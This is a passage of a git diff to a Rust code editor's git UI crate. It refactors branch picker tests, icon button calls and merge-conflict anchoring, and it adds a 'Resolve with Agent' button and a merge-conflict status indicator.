&branch_picker::DeleteBranch, + &focus_handle, + cx, + ) + .map(|kb| kb.size(rems_from_px(12.))), + ) + .on_click(|_, window, cx| { + window.dispatch_action( + branch_picker::DeleteBranch.boxed_clone(), + cx, + ); + }), ) - .on_click(|_, window, cx| { - window - .dispatch_action(branch_picker::DeleteBranch.boxed_clone(), cx); - }), + }, ) .child( Button::new("select_branch", "Select") @@ 
-1197,7 +1207,11 @@ impl PickerDelegate for BranchListDelegate { this.justify_between() .child({ let focus_handle = focus_handle.clone(); - Button::new("filter-remotes", "Filter Remotes") + let filter_label = match self.branch_filter { + BranchFilter::All => "Filter Remote", + BranchFilter::Remote => "Show All", + }; + Button::new("filter-remotes", filter_label) .toggle_state(matches!( self.branch_filter, BranchFilter::Remote @@ -1301,7 +1315,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); }); } @@ -1390,7 +1404,9 @@ mod tests { (branch_list, cx) } - async fn init_fake_repository(cx: &mut TestAppContext) -> Entity { + async fn init_fake_repository( + cx: &mut TestAppContext, + ) -> (Entity, Entity) { let fs = FakeFs::new(cx.executor()); fs.insert_tree( path!("/dir"), @@ -1413,7 +1429,7 @@ mod tests { let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; let repository = cx.read(|cx| project.read(cx).active_repository(cx)); - repository.unwrap() + (project, repository.unwrap()) } #[gpui::test] @@ -1476,7 +1492,7 @@ mod tests { #[gpui::test] async fn test_delete_branch(cx: &mut TestAppContext) { init_test(cx); - let repository = init_fake_repository(cx).await; + let (_project, repository) = init_fake_repository(cx).await; let branches = create_test_branches(); @@ -1511,6 +1527,30 @@ mod tests { }); cx.run_until_parked(); + let expected_branches = ["main", "feature-auth", "feature-ui", "develop"] + .into_iter() + .filter(|name| name != &branch_to_delete) + .collect::>(); + let repo_branches = branch_list + .update(cx, |branch_list, cx| { + branch_list.picker.update(cx, |picker, cx| { + picker + .delegate + .repo + .as_ref() + .unwrap() + .update(cx, |repo, _cx| repo.branches()) + }) + }) + .await + .unwrap() + .unwrap(); + let repo_branches = repo_branches + 
.iter() + .map(|b| b.name()) + .collect::>(); + assert_eq!(&repo_branches, &expected_branches); + branch_list.update(cx, move |branch_list, cx| { branch_list.picker.update(cx, move |picker, _cx| { assert_eq!(picker.delegate.matches.len(), 3); @@ -1520,21 +1560,15 @@ mod tests { .iter() .map(|be| be.name()) .collect::>(); - assert_eq!( - branches, - ["main", "feature-auth", "feature-ui", "develop"] - .into_iter() - .filter(|name| name != &branch_to_delete) - .collect::>() - ); + assert_eq!(branches, expected_branches); }) }); } #[gpui::test] - async fn test_delete_remote(cx: &mut TestAppContext) { + async fn test_delete_remote_branch(cx: &mut TestAppContext) { init_test(cx); - let repository = init_fake_repository(cx).await; + let (_project, repository) = init_fake_repository(cx).await; let branches = vec![ create_test_branch("main", true, Some("origin"), Some(1000)), create_test_branch("feature-auth", false, Some("origin"), Some(900)), @@ -1542,19 +1576,17 @@ mod tests { create_test_branch("develop", false, Some("private"), Some(700)), ]; - let remote_names = branches + let branch_names = branches .iter() - .filter_map(|branch| branch.remote_name().map(|r| r.to_string())) + .map(|branch| branch.name().to_string()) .collect::>(); let repo = repository.clone(); cx.spawn(async move |mut cx| { - for branch in remote_names { - repo.update(&mut cx, |repo, _| { - repo.create_remote(branch, String::from("test")) - }) - .await - .unwrap() - .unwrap(); + for branch in branch_names { + repo.update(&mut cx, |repo, _| repo.create_branch(branch, None)) + .await + .unwrap() + .unwrap(); } }) .await; @@ -1581,6 +1613,35 @@ mod tests { }); cx.run_until_parked(); + let expected_branches = [ + "origin/main", + "origin/feature-auth", + "fork/feature-ui", + "private/develop", + ] + .into_iter() + .filter(|name| name != &branch_to_delete) + .collect::>(); + let repo_branches = branch_list + .update(cx, |branch_list, cx| { + branch_list.picker.update(cx, |picker, cx| { + picker + 
.delegate + .repo + .as_ref() + .unwrap() + .update(cx, |repo, _cx| repo.branches()) + }) + }) + .await + .unwrap() + .unwrap(); + let repo_branches = repo_branches + .iter() + .map(|b| b.name()) + .collect::>(); + assert_eq!(&repo_branches, &expected_branches); + // Check matches, it should match one less branch than before branch_list.update(cx, move |branch_list, cx| { branch_list.picker.update(cx, move |picker, _cx| { @@ -1591,18 +1652,7 @@ mod tests { .iter() .map(|be| be.name()) .collect::>(); - assert_eq!( - branches, - [ - "origin/main", - "origin/feature-auth", - "fork/feature-ui", - "private/develop" - ] - .into_iter() - .filter(|name| name != &branch_to_delete) - .collect::>() - ); + assert_eq!(branches, expected_branches); }) }); } @@ -1721,7 +1771,7 @@ mod tests { const NEW_BRANCH: &str = "new-feature-branch"; init_test(test_cx); - let repository = init_fake_repository(test_cx).await; + let (_project, repository) = init_fake_repository(test_cx).await; let branches = vec![ create_test_branch(MAIN_BRANCH, true, None, Some(1000)), @@ -1785,7 +1835,7 @@ mod tests { #[gpui::test] async fn test_remote_url_detection_https(cx: &mut TestAppContext) { init_test(cx); - let repository = init_fake_repository(cx).await; + let (_project, repository) = init_fake_repository(cx).await; let branches = vec![create_test_branch("main", true, None, Some(1000))]; let (branch_list, mut ctx) = init_branch_list_test(repository.into(), branches, cx).await; diff --git a/crates/git_ui/src/commit_modal.rs b/crates/git_ui/src/commit_modal.rs index 57c25681439f9bb8ea7e5761c01d4c1a9defd427..2088ad77ec5d7e71bdfb42ebcbfab6d001f64375 100644 --- a/crates/git_ui/src/commit_modal.rs +++ b/crates/git_ui/src/commit_modal.rs @@ -366,11 +366,12 @@ impl CommitModal { .unwrap_or_else(|| "".to_owned()); let branch_picker_button = panel_button(branch) - .icon(IconName::GitBranch) - .icon_size(IconSize::Small) - .icon_color(Color::Placeholder) + .start_icon( + Icon::new(IconName::GitBranch) + 
.size(IconSize::Small) + .color(Color::Placeholder), + ) .color(Color::Muted) - .icon_position(IconPosition::Start) .on_click(cx.listener(|_, _, window, cx| { window.dispatch_action(zed_actions::git::Branch.boxed_clone(), cx); })) @@ -452,6 +453,7 @@ impl CommitModal { CommitOptions { amend: is_amend_pending, signoff: is_signoff_enabled, + allow_empty: false, }, window, cx, diff --git a/crates/git_ui/src/commit_tooltip.rs b/crates/git_ui/src/commit_tooltip.rs index 21e7d8a5d1f8e3f5c5b124fe8b276028df91b752..b22fcee7e2de5273983b6959f8c52511b877eeaf 100644 --- a/crates/git_ui/src/commit_tooltip.rs +++ b/crates/git_ui/src/commit_tooltip.rs @@ -12,7 +12,7 @@ use markdown::{Markdown, MarkdownElement}; use project::git_store::Repository; use settings::Settings; use std::hash::Hash; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use time::{OffsetDateTime, UtcOffset}; use ui::{Avatar, CopyButton, Divider, prelude::*, tooltip_container}; use workspace::Workspace; @@ -336,9 +336,10 @@ impl Render for CommitTooltip { format!("#{}", pr.number), ) .color(Color::Muted) - .icon(IconName::PullRequest) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::PullRequest) + .color(Color::Muted), + ) .style(ButtonStyle::Subtle) .on_click(move |_, _, cx| { cx.stop_propagation(); @@ -354,9 +355,9 @@ impl Render for CommitTooltip { ) .style(ButtonStyle::Subtle) .color(Color::Muted) - .icon(IconName::FileGit) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::FileGit).color(Color::Muted), + ) .on_click( move |_, window, cx| { CommitView::open( diff --git a/crates/git_ui/src/commit_view.rs b/crates/git_ui/src/commit_view.rs index 8f2a019fddf0513c100a53956c81012d11c2ca30..aac44c7f9c6eaf6f18c72bea390c0a0b7ad1a4bd 100644 --- a/crates/git_ui/src/commit_view.rs +++ b/crates/git_ui/src/commit_view.rs @@ -3,7 +3,6 @@ use buffer_diff::BufferDiff; use collections::HashMap; use 
editor::display_map::{BlockPlacement, BlockProperties, BlockStyle}; use editor::{Addon, Editor, EditorEvent, ExcerptRange, MultiBuffer, multibuffer_context_lines}; -use feature_flags::{FeatureFlagAppExt as _, GitGraphFeatureFlag}; use git::repository::{CommitDetails, CommitDiff, RepoPath, is_binary_content}; use git::status::{FileStatus, StatusCode, TrackedStatus}; use git::{ @@ -212,7 +211,7 @@ impl CommitView { editor.insert_blocks( [BlockProperties { - placement: BlockPlacement::Above(editor::Anchor::min()), + placement: BlockPlacement::Above(editor::Anchor::Min), height: Some(1), style: BlockStyle::Sticky, render: Arc::new(|_| gpui::Empty.into_any_element()), @@ -223,7 +222,10 @@ impl CommitView { editor .buffer() .read(cx) - .buffer_anchor_to_anchor(&message_buffer, Anchor::MAX, cx) + .snapshot(cx) + .anchor_in_buffer(Anchor::max_for_buffer( + message_buffer.read(cx).remote_id(), + )) .map(|anchor| BlockProperties { placement: BlockPlacement::Below(anchor), height: Some(1), @@ -414,38 +416,7 @@ impl CommitView { } fn calculate_changed_lines(&self, cx: &App) -> (u32, u32) { - let snapshot = self.multibuffer.read(cx).snapshot(cx); - let mut total_additions = 0u32; - let mut total_deletions = 0u32; - - let mut seen_buffers = std::collections::HashSet::new(); - for (_, buffer, _) in snapshot.excerpts() { - let buffer_id = buffer.remote_id(); - if !seen_buffers.insert(buffer_id) { - continue; - } - - let Some(diff) = snapshot.diff_for_buffer_id(buffer_id) else { - continue; - }; - - let base_text = diff.base_text(); - - for hunk in diff.hunks_intersecting_range(Anchor::MIN..Anchor::MAX, buffer) { - let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); - total_additions += added_rows; - - let base_start = base_text - .offset_to_point(hunk.diff_base_byte_range.start) - .row; - let base_end = base_text.offset_to_point(hunk.diff_base_byte_range.end).row; - let deleted_rows = base_end.saturating_sub(base_start); - - total_deletions += deleted_rows; - 
} - } - - (total_additions, total_deletions) + self.multibuffer.read(cx).snapshot(cx).total_changed_lines() } fn render_header(&self, window: &mut Window, cx: &mut Context) -> impl IntoElement { @@ -524,10 +495,11 @@ impl CommitView { .when(self.stash.is_none(), |this| { this.child( Button::new("sha", "Commit SHA") - .icon(copy_icon) - .icon_color(copy_icon_color) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon( + Icon::new(copy_icon) + .size(IconSize::Small) + .color(copy_icon_color), + ) .tooltip({ let commit_sha = commit_sha.clone(); move |_, cx| { @@ -1072,21 +1044,19 @@ impl Render for CommitViewToolbar { }), ) .when(!is_stash, |this| { - this.when(cx.has_flag::(), |this| { - this.child( - IconButton::new("show-in-git-graph", IconName::GitGraph) - .icon_size(IconSize::Small) - .tooltip(Tooltip::text("Show in Git Graph")) - .on_click(move |_, window, cx| { - window.dispatch_action( - Box::new(crate::git_panel::OpenAtCommit { - sha: sha_for_graph.clone(), - }), - cx, - ); - }), - ) - }) + this.child( + IconButton::new("show-in-git-graph", IconName::GitGraph) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Show in Git Graph")) + .on_click(move |_, window, cx| { + window.dispatch_action( + Box::new(crate::git_panel::OpenAtCommit { + sha: sha_for_graph.clone(), + }), + cx, + ); + }), + ) .children(remote_info.map(|(provider_name, url)| { let icon = match provider_name.as_str() { "GitHub" => IconName::Github, diff --git a/crates/git_ui/src/conflict_view.rs b/crates/git_ui/src/conflict_view.rs index 82571b541e692141f843a4c3ef6e082c72e55e48..25175dce48163778615c26a585cd8a6319c1735f 100644 --- a/crates/git_ui/src/conflict_view.rs +++ b/crates/git_ui/src/conflict_view.rs @@ -1,18 +1,27 @@ +use agent_settings::AgentSettings; use collections::{HashMap, HashSet}; use editor::{ ConflictsOurs, ConflictsOursMarker, ConflictsOuter, ConflictsTheirs, ConflictsTheirsMarker, - Editor, EditorEvent, ExcerptId, MultiBuffer, 
RowHighlightOptions, + Editor, EditorEvent, MultiBuffer, RowHighlightOptions, display_map::{BlockContext, BlockPlacement, BlockProperties, BlockStyle, CustomBlockId}, }; use gpui::{ - App, Context, Entity, InteractiveElement as _, ParentElement as _, Subscription, Task, - WeakEntity, + App, ClickEvent, Context, Empty, Entity, InteractiveElement as _, ParentElement as _, + Subscription, Task, WeakEntity, }; use language::{Anchor, Buffer, BufferId}; -use project::{ConflictRegion, ConflictSet, ConflictSetUpdate, ProjectItem as _}; +use project::{ + ConflictRegion, ConflictSet, ConflictSetUpdate, Project, ProjectItem as _, + git_store::{GitStore, GitStoreEvent, RepositoryEvent}, +}; +use settings::Settings; use std::{ops::Range, sync::Arc}; -use ui::{ActiveTheme, Element as _, Styled, Window, prelude::*}; +use ui::{ButtonLike, Divider, Tooltip, prelude::*}; use util::{ResultExt as _, debug_panic, maybe}; +use workspace::{StatusItemView, Workspace, item::ItemHandle}; +use zed_actions::agent::{ + ConflictContent, ResolveConflictedFilesWithAgent, ResolveConflictsWithAgent, +}; pub(crate) struct ConflictAddon { buffers: HashMap, @@ -58,62 +67,22 @@ pub fn register_editor(editor: &mut Editor, buffer: Entity, cx: &mu let buffers = buffer.read(cx).all_buffers(); for buffer in buffers { - buffer_added(editor, buffer, cx); + buffer_ranges_updated(editor, buffer, cx); } cx.subscribe(&cx.entity(), |editor, _, event, cx| match event { - EditorEvent::ExcerptsAdded { buffer, .. } => buffer_added(editor, buffer.clone(), cx), - EditorEvent::ExcerptsExpanded { ids } => { - let multibuffer = editor.buffer().read(cx).snapshot(cx); - for excerpt_id in ids { - let Some(buffer) = multibuffer.buffer_for_excerpt(*excerpt_id) else { - continue; - }; - let addon = editor.addon::().unwrap(); - let Some(conflict_set) = addon.conflict_set(buffer.remote_id()).clone() else { - return; - }; - excerpt_for_buffer_updated(editor, conflict_set, cx); - } + EditorEvent::BufferRangesUpdated { buffer, .. 
} => { + buffer_ranges_updated(editor, buffer.clone(), cx) + } + EditorEvent::BuffersRemoved { removed_buffer_ids } => { + buffers_removed(editor, removed_buffer_ids, cx) } - EditorEvent::ExcerptsRemoved { - removed_buffer_ids, .. - } => buffers_removed(editor, removed_buffer_ids, cx), _ => {} }) .detach(); } -fn excerpt_for_buffer_updated( - editor: &mut Editor, - conflict_set: Entity, - cx: &mut Context, -) { - let conflicts_len = conflict_set.read(cx).snapshot().conflicts.len(); - let buffer_id = conflict_set.read(cx).snapshot().buffer_id; - let Some(buffer_conflicts) = editor - .addon_mut::() - .unwrap() - .buffers - .get(&buffer_id) - else { - return; - }; - let addon_conflicts_len = buffer_conflicts.block_ids.len(); - conflicts_updated( - editor, - conflict_set, - &ConflictSetUpdate { - buffer_range: None, - old_range: 0..addon_conflicts_len, - new_range: 0..conflicts_len, - }, - cx, - ); -} - -#[ztracing::instrument(skip_all)] -fn buffer_added(editor: &mut Editor, buffer: Entity, cx: &mut Context) { +fn buffer_ranges_updated(editor: &mut Editor, buffer: Entity, cx: &mut Context) { let Some(project) = editor.project() else { return; }; @@ -179,14 +148,6 @@ fn conflicts_updated( let conflict_set = conflict_set.read(cx).snapshot(); let multibuffer = editor.buffer().read(cx); let snapshot = multibuffer.snapshot(cx); - let excerpts = multibuffer.excerpts_for_buffer(buffer_id, cx); - let Some(buffer_snapshot) = excerpts - .first() - .and_then(|(excerpt_id, _)| snapshot.buffer_for_excerpt(*excerpt_id)) - else { - return; - }; - let old_range = maybe!({ let conflict_addon = editor.addon_mut::().unwrap(); let buffer_conflicts = conflict_addon.buffers.get(&buffer_id)?; @@ -221,23 +182,7 @@ fn conflicts_updated( let mut removed_highlighted_ranges = Vec::new(); let mut removed_block_ids = HashSet::default(); for (conflict_range, block_id) in old_conflicts { - let Some((excerpt_id, _)) = excerpts.iter().find(|(_, range)| { - let precedes_start = range - .context - .start 
- .cmp(&conflict_range.start, buffer_snapshot) - .is_le(); - let follows_end = range - .context - .end - .cmp(&conflict_range.start, buffer_snapshot) - .is_ge(); - precedes_start && follows_end - }) else { - continue; - }; - let excerpt_id = *excerpt_id; - let Some(range) = snapshot.anchor_range_in_excerpt(excerpt_id, conflict_range) else { + let Some(range) = snapshot.buffer_anchor_range_to_anchor_range(conflict_range) else { continue; }; removed_highlighted_ranges.push(range.clone()); @@ -263,26 +208,9 @@ fn conflicts_updated( let new_conflicts = &conflict_set.conflicts[event.new_range.clone()]; let mut blocks = Vec::new(); for conflict in new_conflicts { - let Some((excerpt_id, _)) = excerpts.iter().find(|(_, range)| { - let precedes_start = range - .context - .start - .cmp(&conflict.range.start, buffer_snapshot) - .is_le(); - let follows_end = range - .context - .end - .cmp(&conflict.range.start, buffer_snapshot) - .is_ge(); - precedes_start && follows_end - }) else { - continue; - }; - let excerpt_id = *excerpt_id; - - update_conflict_highlighting(editor, conflict, &snapshot, excerpt_id, cx); + update_conflict_highlighting(editor, conflict, &snapshot, cx); - let Some(anchor) = snapshot.anchor_in_excerpt(excerpt_id, conflict.range.start) else { + let Some(anchor) = snapshot.anchor_in_excerpt(conflict.range.start) else { continue; }; @@ -293,7 +221,7 @@ fn conflicts_updated( style: BlockStyle::Sticky, render: Arc::new({ let conflict = conflict.clone(); - move |cx| render_conflict_buttons(&conflict, excerpt_id, editor_handle.clone(), cx) + move |cx| render_conflict_buttons(&conflict, editor_handle.clone(), cx) }), priority: 0, }) @@ -319,14 +247,13 @@ fn update_conflict_highlighting( editor: &mut Editor, conflict: &ConflictRegion, buffer: &editor::MultiBufferSnapshot, - excerpt_id: editor::ExcerptId, cx: &mut Context, ) -> Option<()> { log::debug!("update conflict highlighting for {conflict:?}"); - let outer = buffer.anchor_range_in_excerpt(excerpt_id, 
conflict.range.clone())?; - let ours = buffer.anchor_range_in_excerpt(excerpt_id, conflict.ours.clone())?; - let theirs = buffer.anchor_range_in_excerpt(excerpt_id, conflict.theirs.clone())?; + let outer = buffer.buffer_anchor_range_to_anchor_range(conflict.range.clone())?; + let ours = buffer.buffer_anchor_range_to_anchor_range(conflict.ours.clone())?; + let theirs = buffer.buffer_anchor_range_to_anchor_range(conflict.theirs.clone())?; let ours_background = cx.theme().colors().version_control_conflict_marker_ours; let theirs_background = cx.theme().colors().version_control_conflict_marker_theirs; @@ -364,15 +291,15 @@ fn update_conflict_highlighting( fn render_conflict_buttons( conflict: &ConflictRegion, - excerpt_id: ExcerptId, editor: WeakEntity, cx: &mut BlockContext, ) -> AnyElement { + let is_ai_enabled = AgentSettings::get_global(cx).enabled(cx); + h_flex() .id(cx.block_id) .h(cx.line_height) .ml(cx.margins.gutter.width) - .items_end() .gap_1() .bg(cx.theme().colors().editor_background) .child( @@ -385,7 +312,6 @@ fn render_conflict_buttons( move |_, window, cx| { resolve_conflict( editor.clone(), - excerpt_id, conflict.clone(), vec![ours.clone()], window, @@ -405,7 +331,6 @@ fn render_conflict_buttons( move |_, window, cx| { resolve_conflict( editor.clone(), - excerpt_id, conflict.clone(), vec![theirs.clone()], window, @@ -419,13 +344,13 @@ fn render_conflict_buttons( Button::new("both", "Use Both") .label_size(LabelSize::Small) .on_click({ + let editor = editor.clone(); let conflict = conflict.clone(); let ours = conflict.ours.clone(); let theirs = conflict.theirs.clone(); move |_, window, cx| { resolve_conflict( editor.clone(), - excerpt_id, conflict.clone(), vec![ours.clone(), theirs.clone()], window, @@ -435,12 +360,81 @@ fn render_conflict_buttons( } }), ) + .when(is_ai_enabled, |this| { + this.child(Divider::vertical()).child( + Button::new("resolve-with-agent", "Resolve with Agent") + .label_size(LabelSize::Small) + .start_icon( + 
Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ) + .on_click({ + let conflict = conflict.clone(); + move |_, window, cx| { + let content = editor + .update(cx, |editor, cx| { + let multibuffer = editor.buffer().read(cx); + let buffer_id = conflict.ours.end.buffer_id; + let buffer = multibuffer.buffer(buffer_id)?; + let buffer_read = buffer.read(cx); + let snapshot = buffer_read.snapshot(); + let conflict_text = snapshot + .text_for_range(conflict.range.clone()) + .collect::(); + let file_path = buffer_read + .file() + .and_then(|file| file.as_local()) + .map(|f| f.abs_path(cx).to_string_lossy().to_string()) + .unwrap_or_default(); + Some(ConflictContent { + file_path, + conflict_text, + ours_branch_name: conflict.ours_branch_name.to_string(), + theirs_branch_name: conflict.theirs_branch_name.to_string(), + }) + }) + .ok() + .flatten(); + if let Some(content) = content { + window.dispatch_action( + Box::new(ResolveConflictsWithAgent { + conflicts: vec![content], + }), + cx, + ); + } + } + }), + ) + }) .into_any() } +fn collect_conflicted_file_paths(project: &Project, cx: &App) -> Vec { + let git_store = project.git_store().read(cx); + let mut paths = Vec::new(); + + for repo in git_store.repositories().values() { + let snapshot = repo.read(cx).snapshot(); + for (repo_path, _) in snapshot.merge.merge_heads_by_conflicted_path.iter() { + if let Some(project_path) = repo.read(cx).repo_path_to_project_path(repo_path, cx) { + paths.push( + project_path + .path + .as_std_path() + .to_string_lossy() + .to_string(), + ); + } + } + } + + paths +} + pub(crate) fn resolve_conflict( editor: WeakEntity, - excerpt_id: ExcerptId, resolved_conflict: ConflictRegion, ranges: Vec>, window: &mut Window, @@ -452,7 +446,7 @@ pub(crate) fn resolve_conflict( let workspace = editor.workspace()?; let project = editor.project()?.clone(); let multibuffer = editor.buffer().clone(); - let buffer_id = resolved_conflict.ours.end.buffer_id?; + let buffer_id = 
resolved_conflict.ours.end.buffer_id; let buffer = multibuffer.read(cx).buffer(buffer_id)?; resolved_conflict.resolve(buffer.clone(), &ranges, cx); let conflict_addon = editor.addon_mut::().unwrap(); @@ -471,7 +465,7 @@ pub(crate) fn resolve_conflict( .ok()?; let &(_, block_id) = &state.block_ids[ix]; let range = - snapshot.anchor_range_in_excerpt(excerpt_id, resolved_conflict.range)?; + snapshot.buffer_anchor_range_to_anchor_range(resolved_conflict.range)?; editor.remove_gutter_highlights::(vec![range.clone()], cx); @@ -511,3 +505,171 @@ pub(crate) fn resolve_conflict( } }) } + +pub struct MergeConflictIndicator { + project: Entity, + conflicted_paths: Vec, + last_shown_paths: HashSet, + dismissed: bool, + _subscription: Subscription, +} + +impl MergeConflictIndicator { + pub fn new(workspace: &Workspace, cx: &mut Context) -> Self { + let project = workspace.project().clone(); + let git_store = project.read(cx).git_store().clone(); + + let subscription = cx.subscribe(&git_store, Self::on_git_store_event); + + let conflicted_paths = collect_conflicted_file_paths(project.read(cx), cx); + let last_shown_paths: HashSet = conflicted_paths.iter().cloned().collect(); + + Self { + project, + conflicted_paths, + last_shown_paths, + dismissed: false, + _subscription: subscription, + } + } + + fn on_git_store_event( + &mut self, + _git_store: Entity, + event: &GitStoreEvent, + cx: &mut Context, + ) { + let conflicts_changed = matches!( + event, + GitStoreEvent::ConflictsUpdated + | GitStoreEvent::RepositoryUpdated(_, RepositoryEvent::StatusesChanged, _) + ); + + let agent_settings = AgentSettings::get_global(cx); + if !agent_settings.enabled(cx) + || !agent_settings.show_merge_conflict_indicator + || !conflicts_changed + { + return; + } + + let project = self.project.read(cx); + if project.is_via_collab() { + return; + } + + let paths = collect_conflicted_file_paths(project, cx); + let current_paths_set: HashSet = paths.iter().cloned().collect(); + + if paths.is_empty() { + 
self.conflicted_paths.clear(); + self.last_shown_paths.clear(); + self.dismissed = false; + cx.notify(); + } else if self.last_shown_paths != current_paths_set { + self.last_shown_paths = current_paths_set; + self.conflicted_paths = paths; + self.dismissed = false; + cx.notify(); + } + } + + fn resolve_with_agent(&mut self, window: &mut Window, cx: &mut Context) { + window.dispatch_action( + Box::new(ResolveConflictedFilesWithAgent { + conflicted_file_paths: self.conflicted_paths.clone(), + }), + cx, + ); + self.dismissed = true; + cx.notify(); + } + + fn dismiss(&mut self, _: &ClickEvent, _window: &mut Window, cx: &mut Context) { + self.dismissed = true; + cx.notify(); + } +} + +impl Render for MergeConflictIndicator { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + let agent_settings = AgentSettings::get_global(cx); + if !agent_settings.enabled(cx) + || !agent_settings.show_merge_conflict_indicator + || self.conflicted_paths.is_empty() + || self.dismissed + { + return Empty.into_any_element(); + } + + let file_count = self.conflicted_paths.len(); + + let message: SharedString = format!( + "Resolve Merge Conflict{} with Agent", + if file_count == 1 { "" } else { "s" } + ) + .into(); + + let tooltip_label: SharedString = format!( + "Found {} {} across the codebase", + file_count, + if file_count == 1 { + "conflict" + } else { + "conflicts" + } + ) + .into(); + + let border_color = cx.theme().colors().text_accent.opacity(0.2); + + h_flex() + .h(rems_from_px(22.)) + .rounded_sm() + .border_1() + .border_color(border_color) + .child( + ButtonLike::new("update-button") + .child( + h_flex() + .h_full() + .gap_1() + .child( + Icon::new(IconName::GitMergeConflict) + .size(IconSize::Small) + .color(Color::Muted), + ) + .child(Label::new(message).size(LabelSize::Small)), + ) + .tooltip(move |_, cx| { + Tooltip::with_meta( + tooltip_label.clone(), + None, + "Click to Resolve with Agent", + cx, + ) + }) + .on_click(cx.listener(|this, _, 
window, cx| { + this.resolve_with_agent(window, cx); + })), + ) + .child( + div().border_l_1().border_color(border_color).child( + IconButton::new("dismiss-merge-conflicts", IconName::Close) + .icon_size(IconSize::XSmall) + .on_click(cx.listener(Self::dismiss)), + ), + ) + .into_any_element() + } +} + +impl StatusItemView for MergeConflictIndicator { + fn set_active_pane_item( + &mut self, + _: Option<&dyn ItemHandle>, + _window: &mut Window, + _: &mut Context, + ) { + } +} diff --git a/crates/git_ui/src/file_diff_view.rs b/crates/git_ui/src/file_diff_view.rs index 115a53abbc240a37b7d4800c4c7905bed270be91..6fe3d9484b4b6aca72f39ab5672e24e1430114ec 100644 --- a/crates/git_ui/src/file_diff_view.rs +++ b/crates/git_ui/src/file_diff_view.rs @@ -6,9 +6,9 @@ use editor::{Editor, EditorEvent, MultiBuffer}; use futures::{FutureExt, select_biased}; use gpui::{ AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle, - Focusable, IntoElement, Render, Task, WeakEntity, Window, + Focusable, Font, IntoElement, Render, Task, WeakEntity, Window, }; -use language::{Buffer, LanguageRegistry}; +use language::{Buffer, HighlightedText, LanguageRegistry}; use project::Project; use std::{ any::{Any, TypeId}, @@ -21,7 +21,7 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString}; use util::paths::PathExt as _; use workspace::{ Item, ItemHandle as _, ItemNavHistory, ToolbarItemLocation, Workspace, - item::{BreadcrumbText, ItemEvent, SaveOptions, TabContentParams}, + item::{ItemEvent, SaveOptions, TabContentParams}, searchable::SearchableItemHandle, }; @@ -108,7 +108,7 @@ impl FileDiffView { for buffer in [&old_buffer, &new_buffer] { cx.subscribe(buffer, move |this, _, event, _| match event { - language::BufferEvent::Edited + language::BufferEvent::Edited { .. 
} | language::BufferEvent::LanguageChanged(_) | language::BufferEvent::Reparsed => { this.buffer_changes_tx.send(()).ok(); @@ -324,7 +324,7 @@ impl Item for FileDiffView { ToolbarItemLocation::PrimaryLeft } - fn breadcrumbs(&self, cx: &App) -> Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { self.editor.breadcrumbs(cx) } @@ -379,7 +379,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } diff --git a/crates/git_ui/src/file_history_view.rs b/crates/git_ui/src/file_history_view.rs index ffd600c32af5be8fe9f390b93b6f96911bfecb07..e0cee4ef1d66b7c09ff249d2323fc9fa72abbd7c 100644 --- a/crates/git_ui/src/file_history_view.rs +++ b/crates/git_ui/src/file_history_view.rs @@ -429,10 +429,11 @@ impl Render for FileHistoryView { Button::new("load-more", "Load More") .disabled(self.loading_more) .label_size(LabelSize::Small) - .icon(IconName::ArrowCircle) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::ArrowCircle) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(cx.listener(|this, _, window, cx| { this.load_more(window, cx); })), @@ -565,7 +566,10 @@ impl Item for FileHistoryView { false } - fn breadcrumbs(&self, _cx: &App) -> Option> { + fn breadcrumbs( + &self, + _cx: &App, + ) -> Option<(Vec, Option)> { None } diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 31cbc34c060a5e9abd26a704ae82a57148a70df0..1d907b969f9b6288a9b72b0cdc7b5445d63268fa 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -2,6 +2,7 @@ use crate::askpass_modal::AskPassModal; use crate::commit_modal::CommitModal; use crate::commit_tooltip::CommitTooltip; use crate::commit_view::CommitView; +use crate::git_panel_settings::GitPanelScrollbarAccessor; use 
crate::project_diff::{self, BranchDiff, Diff, ProjectDiff}; use crate::remote_output::{self, RemoteAction, SuccessMessage}; use crate::{branch_picker, picker_prompt, render_remote_button}; @@ -12,14 +13,14 @@ use crate::{ use agent_settings::AgentSettings; use anyhow::Context as _; use askpass::AskPassDelegate; -use cloud_llm_client::CompletionIntent; use collections::{BTreeMap, HashMap, HashSet}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use editor::{ Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset, actions::ExpandAllDiffHunks, }; use editor::{EditorStyle, RewrapOptions}; +use file_icons::FileIcons; use futures::StreamExt as _; use git::commit::ParsedCommitMessage; use git::repository::{ @@ -41,21 +42,22 @@ use gpui::{ WeakEntity, actions, anchored, deferred, point, size, uniform_list, }; use itertools::Itertools; -use language::{Buffer, BufferEvent, File}; +use language::{Buffer, File}; use language_model::{ - ConfiguredModel, LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, Role, + CompletionIntent, ConfiguredModel, LanguageModelRegistry, LanguageModelRequest, + LanguageModelRequestMessage, Role, }; use menu; -use multi_buffer::ExcerptInfo; +use multi_buffer::ExcerptBoundaryInfo; use 